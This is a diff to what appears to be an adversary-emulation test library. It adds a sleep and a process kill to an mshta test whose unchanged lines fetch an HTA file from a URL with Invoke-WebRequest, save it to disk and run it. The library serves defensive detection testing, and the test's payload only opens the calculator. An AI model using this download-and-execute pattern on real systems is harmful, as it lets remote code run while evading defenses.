diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 332e2f06..3fad9a69 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -14998,6 +14998,8 @@ defense-evasion:
           $var =Invoke-WebRequest "#{hta_url}"
           $var.content|out-file "#{temp_file}"
           mshta "#{temp_file}"
+          start-sleep -s 15
+          stop-process -name "calculator" -Force
         cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
 
           '
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 0810fcc5..423de368 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -124,6 +124,8 @@ Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
 $var =Invoke-WebRequest "#{hta_url}"
 $var.content|out-file "#{temp_file}"
 mshta "#{temp_file}"
+start-sleep -s 15
+stop-process -name "calculator" -Force
 ```
 
 #### Cleanup Commands: